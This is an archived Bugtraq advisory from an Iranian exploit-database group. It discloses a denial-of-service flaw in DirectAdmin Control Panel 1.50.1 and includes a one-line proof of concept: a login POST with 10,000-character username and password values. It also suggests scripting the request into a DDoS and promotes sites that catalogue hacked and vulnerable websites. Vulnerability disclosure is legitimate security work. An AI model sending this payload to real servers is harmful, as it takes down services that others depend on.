[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Directadmin ControlPanel 1.50.1 denial of service Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Directadmin ControlPanel 1.50.1 denial of service Vulnerability
From: iedb.team@xxxxxxxxx
Date: Tue, 10 Jan 2017 16:34:25 GMT

DirectAdmin Control Panel version 1.50.1 suffers from a denial of service 
vulnerability.


#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@ 
 
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@ 
 
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@ 
 
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# Directadmin ControlPanel 1.50.1 denial of service Vulnerability

# Directadmin Version : 1.50.1 And Old Version

# Testet On : Centos 6 - Directadmin 1.50.1

# Vendor site : http://www.directadmin.com

# Author : Amir ( iedb.team@xxxxxxxxx - https://telegram.me/AmirAm67)

# Site : Www.IeDb.Ir  -  irist.ir   -   xssed.Ir

# Iedb Telegram : https://telegram.me/iedbteam

# Archive Exploit = http://www.iedb.ir/exploits-6517.html

#####################################

Description :

An attacker can send a username and password in the login screen DirectAdmin 
long,DirectAdmin to disrupt And Crach.
This problem is present in all versions of DirectAdmin.
There is no limit on the number of characters entered.
attacker could write a script to attack DDoS based on the following information:

http://Ip:2222/CMD_LOGIN

POST /CMD_LOGIN HTTP/1.1

referer=%2F&username=$POC&password=$POC

$POC = A * 10000

#####################################

** http://iedb.ir  ==>> Iranian Exploit DataBase And Iranian Security Team

** http://irist.ir  ==>> Register hacked sites

** http://xssed.Ir  ==>>  Sign vulnerable sites ( xss and sql ) (Vulnerability 
attack information site)

Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck 
M4n,black_security,Yasser,Ramin 
Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,Ramin
 Asadyan,

Be_lucky,Moslem 
Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3
 And all my friends And All Member In Iedb.Ir Team

#####################################

#  Archive Exploit = http://www.iedb.ir/exploits-6517.html

#####################################

Prev by Date: ESA-2016-096: EMC Celerra, VNX1, VNX2 and VNXe SMB NTLM Authentication Weak Nonce Vulnerability
Next by Date: ESA-2016-096: EMC Celerra, VNX1, VNX2 and VNXe SMB NTLM Authentication Weak Nonce Vulnerability
Previous by thread: ESA-2016-096: EMC Celerra, VNX1, VNX2 and VNXe SMB NTLM Authentication Weak Nonce Vulnerability
Next by thread: FreeBSD Security Advisory FreeBSD-SA-17:01.openssh
Index(es):
- Date
- Thread